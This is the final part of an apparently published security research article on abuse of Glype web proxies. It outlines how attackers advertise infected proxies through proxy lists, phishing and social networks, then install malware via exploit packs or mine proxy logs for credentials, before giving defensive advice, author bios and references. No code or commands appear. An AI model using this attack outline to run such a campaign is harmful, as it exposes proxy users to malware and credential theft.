Advertising Glype proxy: once the Glype proxy-based attack is set up, the next step is to start advertising the Glype proxy. Advertising is usually done to collect revenue based on hits, but in this case the prime motivation for an attacker is to get traffic so that the infectious code can be distributed. Advertising can play a critical role in the success of attacks. Several methods are used by attackers to advertise their infected Glype proxies:

  • Proxy lists: public proxy lists are one of the most widely accepted methods for advertising Glype proxies. For example, paying a few dollars allows an infected Glype proxy to be numbered among the top-ten proxies, which is a good deal from the attacker's perspective. This approach can increase traffic on the infected Glype proxy. Figure 3 shows how a proxy can be advertised.
  • Phishing: attackers use phishing attacks to distribute the URL pointing to their infected Glype proxy. Phishing attacks have been effective for exploiting users' trust and belief in the security of proxies.
  • Social networks: attackers advertise the proxy on social networks, message boards and advertising links. Due to their popularity and trustworthiness, social networks have become the preferred choice of attackers for distributing malware. It is easy and profitable.

On completion of this process, attackers have successfully distributed information about their infected Glype proxy to a variety of outlets on the Internet. After this, the attacker waits for the infections to trigger.

Post-exploitation: once the infected proxy site has been visited, there are two vectors of attack. If a user is to be directed to a malicious website loaded with malware, the BEP there installs malware on the user's computer and the computer is owned by the attacker. If the Glype proxy is being used to gather information, the attacker starts mining the logs to track the IP addresses and extract personal information, possibly including account credentials. Information collected from Glype proxies can also be very useful for designing other attack vectors. For example, information specific to an individual can be collected for a later, more effective spear-phishing attack. This attack model is typically part of a distributed attack and can be very effective in spreading infections widely.

Proactive steps

There are several steps that users can take when dealing with Glype proxies for anonymous surfing on the Internet:

  • Avoid proxy services for surfing websites that require critical information, such as financial credentials, to be delivered to the server. Users should be aware that their data is being transferred through a public proxy. A classic example would be employees circumventing restrictions put in place by the organisation they work for – such circumvention could open a big hole.
  • There are legitimate and authentic proxy services on the Internet. However, it is still not advised to use the services directly. A user should verify the integrity of a proxy provider to check whether it is a legitimate service provider or a fraudulent entity.
  • If a Glype proxy is deployed for internal use, it should be ensured that the Glype proxy is configured in a secure way. Default credentials must be changed to stronger ones. Log files should not be publicly accessible, which can be achieved by configuring the settings.php and .htaccess files on the server.
  • Users should maintain good surfing habits on the Internet. For example, they should always think twice before clicking a link that is embedded in an email. Additionally, they should be suspicious of attachments and verify them before downloading. These operational habits depend on the security knowledge of the user and show the importance of user education. Organisations should have a robust security training model to educate users about the latest web attack trends and appropriate secure behaviour.

The steps discussed above can be effective in reducing the infection rate and preserving the integrity of users.

Conclusion

Glype proxies have been increasing in popularity over the past few years. Generally, Glype proxies assist in maintaining a user's integrity and privacy. However, they can also be used as an attack platform because of some inherent design flaws. First, insecure configuration of Glype proxies can result in the stealing of information. Second, attackers can extend the Glype proxy code to conduct web-based attacks by tricking a user into visiting a malicious domain or routing the web traffic through Glype proxies. Finally, security greatly depends on users' ability to make secure decisions when on the Internet. Secure behaviour can help thwart a number of attack scenarios. Be vigilant and surf securely.

Figure 3: Advertising proxies on the Internet.

About the authors

Aditya K Sood is a senior security practitioner and PhD candidate at Michigan State University. He has already worked in the security domain for Armorize, COSEINC and KPMG. He is also a founder of SecNiche Security, an independent security research lab. He has been an active speaker at industry conferences such as DEFCON, HackInTheBox, LayerOne, Source, RSA, BruCon, ToorCon, HackerHalted, TRISC, EuSecwest, XCON, Troopers, OWASP AppSec, US-CERT GFIRST and many others. He has authored several papers for various publishers including IEEE, Elsevier, Crosstalk, Virus Bulletin, ISACA, ISSA and HITB.

Peter Greko is a security researcher at SecNiche Security Labs where he deals with cyber-security issues. Previously he has worked in the cyber-security divisions of Sypris and Citigroup. He has spoken at several conferences, including HackerHalted, AppSec DC, HOPE, Swiss CyberStorm and local OWASP and ISSA chapter meetings.

Richard J Enbody, PhD is associate professor in the Department of Computer Science and Engineering at Michigan State University (US), where he joined the faculty in 1987. He earned his PhD at the University of Minnesota (1987) and his BA at Carleton College (1976). His research interests include computer security, computer architecture, web-based distance education, and CS1 education. Enbody has written a CS1 text using Python: 'The Practice of Computing Using Python, Second Edition', published by Addison-Wesley 2012.

References

1. Glype proxy. Accessed Nov 2012. www.glype.com.
2. Proxilla Glype Proxy Client – Mozilla Firefox Add-On. Accessed Nov 2012. https://addons.mozilla.org/en-US/firefox/addon/proxilla/.
3. Powers, JL. 'Tracking Malware with Public Proxy Lists'. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/malicious/tracking-malware-public-proxy-lists_33604.
4. Brozycki, Z. 'Detecting and Preventing Anonymous Proxy Usage'. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/detection/detecting-preventing-anonymous-proxy-usage_32943.
5. 'TOR (The Onion Router)'. University of Michigan. Accessed Nov 2012. http://webapps.lsa.umich.edu/lsait/admin/TOR%20Routing%20Infomation%20.pdf.
6. Huang, L; Chen, EY; Barth, A; Rescorla, E; Jackson, C. 'Talking to Yourself for Fun and Profit'. Accessed Nov 2012. www.w2spconf.com/2011/papers/websocket.pdf.
7. 'When You Think You Surf Anonymously But You Don't'. Swiss Security Blog, 26 Apr 2010. Accessed Nov 2012. www.abuse.ch/?p=2534.
8. BlockScript, home page. Accessed Nov 2012. www.blockscript.com.
9. Rydstedt, G; Bursztein, E; Boneh, D; Jackson, C. 'Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites'. Stanford SecLab, 20 Jul 2010. Accessed Nov 2012. http://seclab.stanford.edu/websec/framebusting/framebust.pdf.
10. Sood, AK; Enbody, RJ. 'Frametrapping the framebusting defence'. Network Security, October 2011. Accessed Nov 2012. www.sciencedirect.com/science/article/pii/S1353485811701052.
11. Sood, AK; Enbody, RJ. 'Browser Exploit Packs – Exploitation Tactics'. ToorCon Security Conference, October 2011, San Diego. Accessed Nov 2012. http://secniche.blogspot.com/2011/06/toorcon-seattle-2011-browser-exploit.html.